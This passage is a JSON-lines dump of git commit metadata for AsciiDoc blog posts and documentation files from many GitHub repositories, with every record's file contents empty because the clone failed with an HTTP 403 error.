2015-05-01-Guten-Tag.adoc","repos":"sonyl\/sonyl.github.io,sonyl\/sonyl.github.io,sonyl\/sonyl.github.io","old_file":"_posts\/2015-05-01-Guten-Tag.adoc","new_file":"_posts\/2015-05-01-Guten-Tag.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sonyl\/sonyl.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cef9adb664bb28daedc64d9f551ba25c2b38785b","subject":"Update 2015-06-11-Fireworks.adoc","message":"Update 2015-06-11-Fireworks.adoc","repos":"yysk\/yysk.github.io,yysk\/yysk.github.io,yysk\/yysk.github.io","old_file":"_posts\/2015-06-11-Fireworks.adoc","new_file":"_posts\/2015-06-11-Fireworks.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/yysk\/yysk.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"69a6516c1c922c0626d7d49f21c2d812eb88fe4e","subject":"README.adoc for controlled_ctor_dtor","message":"README.adoc for controlled_ctor_dtor\n","repos":"ajneu\/cpp_experiments","old_file":"controlled_ctor_dtor\/README.adoc","new_file":"controlled_ctor_dtor\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ajneu\/cpp_experiments.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"734b9641a3130f689b244f844f36be84aadf5ed8","subject":"Update 2015-06-18-Mein-freiwilliges-politisches-Jahr-Teil-1.adoc","message":"Update 2015-06-18-Mein-freiwilliges-politisches-Jahr-Teil-1.adoc","repos":"hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io","old_file":"_posts\/2015-06-18-Mein-freiwilliges-politisches-Jahr-Teil-1.adoc","new_file":"_posts\/2015-06-18-Mein-freiwilliges-politisches-Jahr-Teil-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hoernschen\/hoernschen.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"76a56ee44ae10f9e21a38386e812146db4d47ce4","subject":"Update 2016-04-16-google-analytics-with-google-apps-script2.adoc","message":"Update 2016-04-16-google-analytics-with-google-apps-script2.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-04-16-google-analytics-with-google-apps-script2.adoc","new_file":"_posts\/2016-04-16-google-analytics-with-google-apps-script2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"19426326879c97e67242c6b1f474a0598429d8cd","subject":"y2b create post BulletTrain Express First Look CES 2012","message":"y2b create post BulletTrain Express First Look CES 2012","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-01-14-BulletTrain-Express-First-Look-CES-2012.adoc","new_file":"_posts\/2012-01-14-BulletTrain-Express-First-Look-CES-2012.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fc838656d3a386309e1aea7be82fc0d7a3de7ba3","subject":"Update 2013-12-09-Der-Email-Verteiler-der-Linux-User-Group-Oldenburg.adoc","message":"Update 2013-12-09-Der-Email-Verteiler-der-Linux-User-Group-Oldenburg.adoc","repos":"fraslo\/fraslo.github.io,fraslo\/fraslo.github.io,fraslo\/fraslo.github.io","old_file":"_posts\/2013-12-09-Der-Email-Verteiler-der-Linux-User-Group-Oldenburg.adoc","new_file":"_posts\/2013-12-09-Der-Email-Verteiler-der-Linux-User-Group-Oldenburg.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fraslo\/fraslo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3304ee7e8d5f7dd6f6504b9f9787e22b22609e33","subject":"Update 2015-09-10-Centos-7-developer-workstation-on-VirtualBox-notes.adoc","message":"Update 2015-09-10-Centos-7-developer-workstation-on-VirtualBox-notes.adoc","repos":"blater\/blater.github.io,blater\/blater.github.io,blater\/blater.github.io","old_file":"_posts\/2015-09-10-Centos-7-developer-workstation-on-VirtualBox-notes.adoc","new_file":"_posts\/2015-09-10-Centos-7-developer-workstation-on-VirtualBox-notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blater\/blater.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d13000820917d7c3dc7065984ed7e75c1031eb82","subject":"Update 2012-10-24-A-Makefile-for-the-simplest-shared-library.adoc","message":"Update 2012-10-24-A-Makefile-for-the-simplest-shared-library.adoc","repos":"codechunks\/codechunks.github.io,codechunks\/codechunks.github.io,codechunks\/codechunks.github.io,codechunks\/codechunks.github.io","old_file":"_posts\/2012-10-24-A-Makefile-for-the-simplest-shared-library.adoc","new_file":"_posts\/2012-10-24-A-Makefile-for-the-simplest-shared-library.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/codechunks\/codechunks.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f867df6825a9920757fe51dfbdd97afaa39a8d0f","subject":"Update 2015-08-24-And-yet-another-RStatisticsWhatsoever-blog.adoc","message":"Update 2015-08-24-And-yet-another-RStatisticsWhatsoever-blog.adoc","repos":"CBSti\/CBSti.github.io,CBSti\/CBSti.github.io,CBSti\/CBSti.github.io","old_file":"_posts\/2015-08-24-And-yet-another-RStatisticsWhatsoever-blog.adoc","new_file":"_posts\/2015-08-24-And-yet-another-RStatisticsWhatsoever-blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/CBSti\/CBSti.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9affd720d30265d0f06adb915df03eac39654065","subject":"Update 2016-01-18-LTSP-Images-servidas-por-Servidore-de-Aula.adoc","message":"Update 2016-01-18-LTSP-Images-servidas-por-Servidore-de-Aula.adoc","repos":"iesextremadura\/iesextremadura.github.io,iesextremadura\/iesextremadura.github.io,iesextremadura\/iesextremadura.github.io","old_file":"_posts\/2016-01-18-LTSP-Images-servidas-por-Servidore-de-Aula.adoc","new_file":"_posts\/2016-01-18-LTSP-Images-servidas-por-Servidore-de-Aula.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/iesextremadura\/iesextremadura.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"22192646006a7b19a4328dc33d3116ec87139f1a","subject":"Introduce \"Release Notes\" template","message":"Introduce \"Release Notes\" template\n","repos":"junit-team\/junit-lambda,sbrannen\/junit-lambda","old_file":"documentation\/src\/docs\/asciidoc\/release-notes\/release-notes-TEMPLATE.adoc","new_file":"documentation\/src\/docs\/asciidoc\/release-notes\/release-notes-TEMPLATE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sbrannen\/junit-lambda.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"cdf06ff5d000db3ff73330ebc11f2b79b768bec7","subject":"Update 2016-04-04-Readability-of-Code.adoc","message":"Update 2016-04-04-Readability-of-Code.adoc","repos":"metasean\/blog,metasean\/blog,metasean\/hubpress.io,metasean\/hubpress.io,metasean\/blog,metasean\/hubpress.io,metasean\/blog","old_file":"_posts\/2016-04-04-Readability-of-Code.adoc","new_file":"_posts\/2016-04-04-Readability-of-Code.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/metasean\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3f0fdea67ff8b84c2745afa90f8977025dfac231","subject":"Update 2018-02-27-When-the-RTFM-sucks.adoc","message":"Update 2018-02-27-When-the-RTFM-sucks.adoc","repos":"costalfy\/costalfy.github.io,costalfy\/costalfy.github.io,costalfy\/costalfy.github.io,costalfy\/costalfy.github.io","old_file":"_posts\/2018-02-27-When-the-RTFM-sucks.adoc","new_file":"_posts\/2018-02-27-When-the-RTFM-sucks.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/costalfy\/costalfy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3ede0f8388f42c2b1a26c0f660b5cfe0ae2f2dfe","subject":"Update 2015-11-05-improve-your-java-environment-with-docker.adoc","message":"Update 2015-11-05-improve-your-java-environment-with-docker.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2015-11-05-improve-your-java-environment-with-docker.adoc","new_file":"_posts\/2015-11-05-improve-your-java-environment-with-docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cbf5dac5c0893f17a96c14f062e19892c4ccd8d3","subject":"Update 2015-12-14-treat-your-pom-the-same-as-your-java-code.adoc","message":"Update 2015-12-14-treat-your-pom-the-same-as-your-java-code.adoc","repos":"topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io","old_file":"_posts\/2015-12-14-treat-your-pom-the-same-as-your-java-code.adoc","new_file":"_posts\/2015-12-14-treat-your-pom-the-same-as-your-java-code.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/topicusonderwijs\/topicusonderwijs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f9d3af2cd52c6f7e4ecf44973248840455c5bf98","subject":"Update 2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","message":"Update 2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"23fdc5eaa3f27c0210df7b480581ab7e4c1d807e","subject":"Update 2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","message":"Update 2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_file":"_posts\/2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"26570401e53de4d87ea2ce333932167bdb45582b","subject":"README","message":"README\n","repos":"eee-c\/dart-comics,eee-c\/dart-comics,eee-c\/dart-comics","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/eee-c\/dart-comics.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6d31c8c4bd1f310aed98acff8e5dc965ff4f385d","subject":"y2b create post 3 Cool Tech Deals - #7","message":"y2b create post 3 Cool Tech Deals - #7","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-08-25-3-Cool-Tech-Deals--7.adoc","new_file":"_posts\/2015-08-25-3-Cool-Tech-Deals--7.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"340dfd0cccc18a9e7e1adef8a6493443b1b50a5b","subject":"Update 2017-02-03-What-Git-Lab-Left-Us.adoc","message":"Update 2017-02-03-What-Git-Lab-Left-Us.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-03-What-Git-Lab-Left-Us.adoc","new_file":"_posts\/2017-02-03-What-Git-Lab-Left-Us.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d4f6c2c51da1c913a3c65b7ed207b609048b173d","subject":"Update 2017-12-31-Discourse-as-a-killer-community-discussion-software.adoc","message":"Update 2017-12-31-Discourse-as-a-killer-community-discussion-software.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2017-12-31-Discourse-as-a-killer-community-discussion-software.adoc","new_file":"_posts\/2017-12-31-Discourse-as-a-killer-community-discussion-software.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7fe04847ce0c5237466742095013dc12f9581db4","subject":"Initial proposal on resource definitions","message":"Initial proposal on resource definitions\n","repos":"jenmalloy\/enmasse,EnMasseProject\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,jenmalloy\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,EnMasseProject\/enmasse,EnMasseProject\/enmasse","old_file":"documentation\/design_docs\/design\/resource-definitions.adoc","new_file":"documentation\/design_docs\/design\/resource-definitions.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jenmalloy\/enmasse.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2cdccda89c9e2d7f5b7b5a57f82e7f3ba4e2651c","subject":"Update 2015-05-17-Leonardo-da-Gerti.adoc","message":"Update 2015-05-17-Leonardo-da-Gerti.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"_posts\/2015-05-17-Leonardo-da-Gerti.adoc","new_file":"_posts\/2015-05-17-Leonardo-da-Gerti.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c5377ccfb13584d30eb69cd46b4a0dd713489113","subject":"Update 2015-05-30-My-Asyncjs-Cheatsheet.adoc","message":"Update 2015-05-30-My-Asyncjs-Cheatsheet.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-05-30-My-Asyncjs-Cheatsheet.adoc","new_file":"_posts\/2015-05-30-My-Asyncjs-Cheatsheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"485a4797d77cf2546365908d84517c3a67d0bbcc","subject":"Update 2015-12-28-AirHacX-Tracking-Unit.adoc","message":"Update 2015-12-28-AirHacX-Tracking-Unit.adoc","repos":"AirHacX\/blog.airhacx.com,AirHacX\/blog.airhacx.com,AirHacX\/blog.airhacx.com","old_file":"_posts\/2015-12-28-AirHacX-Tracking-Unit.adoc","new_file":"_posts\/2015-12-28-AirHacX-Tracking-Unit.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/AirHacX\/blog.airhacx.com.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3835e417dd0380e87bb4d1524ec5bf96e721b9de","subject":"y2b create post Massive 100-inch Laser TV -- LG HECTO (CES 2013)","message":"y2b create post Massive 100-inch Laser TV -- LG HECTO (CES 2013)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-01-10-Massive-100inch-Laser-TV--LG-HECTO-CES-2013.adoc","new_file":"_posts\/2013-01-10-Massive-100inch-Laser-TV--LG-HECTO-CES-2013.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6bbd94eac86eb987766b62bd8904bc8adb1142b8","subject":"Update 2014-11-08-Creating-a-Custom-Gradle-Tooling-API-Model.adoc","message":"Update 2014-11-08-Creating-a-Custom-Gradle-Tooling-API-Model.adoc","repos":"jkschneider\/jkschneider.github.io,jkschneider\/jkschneider.github.io,jkschneider\/jkschneider.github.io","old_file":"_posts\/2014-11-08-Creating-a-Custom-Gradle-Tooling-API-Model.adoc","new_file":"_posts\/2014-11-08-Creating-a-Custom-Gradle-Tooling-API-Model.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jkschneider\/jkschneider.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bdd54b079d0d85f67dbcbc0d18b8919ecabf489f","subject":"Update 2015-06-18-Mein-freiwilliges-politisches-Jahr-Teil-1.adoc","message":"Update 2015-06-18-Mein-freiwilliges-politisches-Jahr-Teil-1.adoc","repos":"hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io","old_file":"_posts\/2015-06-18-Mein-freiwilliges-politisches-Jahr-Teil-1.adoc","new_file":"_posts\/2015-06-18-Mein-freiwilliges-politisches-Jahr-Teil-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hoernschen\/hoernschen.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"261c938d80032f9dcc1e172ccfd8bc7c7074ab83","subject":"Update 2016-03-20-Douleurs-extremes-a-latterrissage-en-avion.adoc","message":"Update 2016-03-20-Douleurs-extremes-a-latterrissage-en-avion.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-20-Douleurs-extremes-a-latterrissage-en-avion.adoc","new_file":"_posts\/2016-03-20-Douleurs-extremes-a-latterrissage-en-avion.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"72478b8f3993069a98fd440be680e7c471519cfc","subject":"added readme","message":"added readme\n","repos":"fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss","old_file":"jbpm\/business-application-mysql\/readme.adoc","new_file":"jbpm\/business-application-mysql\/readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fmarchioni\/mastertheboss.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"84d84a19ff58a78c3d9197b95279a6b95d6c812f","subject":"y2b create post Resistance 3 Doomsday Edition Unboxing \\u0026 Overview","message":"y2b create post Resistance 3 Doomsday Edition Unboxing \\u0026 Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-09-06-Resistance-3-Doomsday-Edition-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2011-09-06-Resistance-3-Doomsday-Edition-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"84e9f838ac2a1d8130c736f7bd622b4ac73ce5cd","subject":"Update 2018-01-05-carry-out-tutorial-on-Laravel-amp-Docker.adoc","message":"Update 2018-01-05-carry-out-tutorial-on-Laravel-amp-Docker.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-01-05-carry-out-tutorial-on-Laravel-amp-Docker.adoc","new_file":"_posts\/2018-01-05-carry-out-tutorial-on-Laravel-amp-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"33c465ef2ad39848273c648234e46f185e26379e","subject":"Update 2019-02-17-Factory-Method-Pattern-For-Simple-but-many-I-F-branch.adoc","message":"Update 2019-02-17-Factory-Method-Pattern-For-Simple-but-many-I-F-branch.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-02-17-Factory-Method-Pattern-For-Simple-but-many-I-F-branch.adoc","new_file":"_posts\/2019-02-17-Factory-Method-Pattern-For-Simple-but-many-I-F-branch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cd0f1eb856c0de22d784cfb2cd9075cdf30fd4ba","subject":"Update 2016-04-29-10-biggest-mistakes-in-using-static-analysis.adoc","message":"Update 2016-04-29-10-biggest-mistakes-in-using-static-analysis.adoc","repos":"mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io","old_file":"_posts\/2016-04-29-10-biggest-mistakes-in-using-static-analysis.adoc","new_file":"_posts\/2016-04-29-10-biggest-mistakes-in-using-static-analysis.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mikealdo\/mikealdo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9cf94d9e7deb2a250f1d07e1fd5e7976327b0380","subject":"Document how init.groovy.d works a bit","message":"Document how init.groovy.d works a bit\n","repos":"CodeValet\/codevalet,CodeValet\/codevalet,CodeValet\/codevalet","old_file":"init.groovy.d\/README.adoc","new_file":"init.groovy.d\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/CodeValet\/codevalet.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"7d71ed336cfda5ee7cb3aaa2ab0fc6998134c5c4","subject":"y2b create post My Ultimate Setup - Episode 2","message":"y2b create post My Ultimate Setup - Episode 2","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-04-07-My-Ultimate-Setup--Episode-2.adoc","new_file":"_posts\/2015-04-07-My-Ultimate-Setup--Episode-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cf54a1f3d377974eee9896729720606c77b05c1b","subject":"Update 2017-12-08-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","message":"Update 2017-12-08-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-12-08-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","new_file":"_posts\/2017-12-08-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5bdafd61598c085b05d0d207ac69a89b3b93aed1","subject":"y2b create post Feenix Autore Keyboard + Nascita Gaming Mouse Unboxing","message":"y2b create post Feenix Autore Keyboard + Nascita Gaming Mouse Unboxing","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-04-14-Feenix-Autore-Keyboard--Nascita-Gaming-Mouse-Unboxing.adoc","new_file":"_posts\/2014-04-14-Feenix-Autore-Keyboard--Nascita-Gaming-Mouse-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a15064ac753a5bb0f138f19e95ec62261ccbf187","subject":"Add heroku docs","message":"Add heroku docs\n","repos":"gentics\/mesh,gentics\/mesh,gentics\/mesh,gentics\/mesh","old_file":"doc\/src\/main\/docs\/deployment-heroku.asciidoc","new_file":"doc\/src\/main\/docs\/deployment-heroku.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gentics\/mesh.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"04935f07c81131147282da052f237f095925e29e","subject":"Fix formatting in 6.4 upgrade recipe","message":"Fix formatting in 6.4 upgrade recipe","repos":"droolsjbpm\/optaplanner-website,oskopek\/optaplanner-website,oskopek\/optaplanner-website,droolsjbpm\/optaplanner-website,oskopek\/optaplanner-website,droolsjbpm\/optaplanner-website","old_file":"download\/upgradeRecipe\/upgradeRecipe6.4.adoc","new_file":"download\/upgradeRecipe\/upgradeRecipe6.4.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oskopek\/optaplanner-website.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"feef89962dbdb287248061c1427701242aa84be8","subject":"Create readme.adoc","message":"Create readme.adoc","repos":"fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss","old_file":"ldap\/embedded\/readme.adoc","new_file":"ldap\/embedded\/readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fmarchioni\/mastertheboss.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4b9225ffe449fbe4ba95c5055e49c5acc9a2bd01","subject":"Update 2016-10-07-SELF-DRIVING-BUSES-HIT-THE-ROAD-IN-HELSINKI.adoc","message":"Update 2016-10-07-SELF-DRIVING-BUSES-HIT-THE-ROAD-IN-HELSINKI.adoc","repos":"IEEECompute\/blog,IEEECompute\/blog,IEEECompute\/blog,IEEECompute\/blog","old_file":"_posts\/2016-10-07-SELF-DRIVING-BUSES-HIT-THE-ROAD-IN-HELSINKI.adoc","new_file":"_posts\/2016-10-07-SELF-DRIVING-BUSES-HIT-THE-ROAD-IN-HELSINKI.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/IEEECompute\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6de211e8aca71249dcd2d0a74d1d2017d3c66e9e","subject":"Split file system watching into a separate page","message":"Split file system watching into a separate page","repos":"gradle\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle","old_file":"subprojects\/docs\/src\/docs\/userguide\/running-builds\/file_system_watching.adoc","new_file":"subprojects\/docs\/src\/docs\/userguide\/running-builds\/file_system_watching.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gradle\/gradle.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} 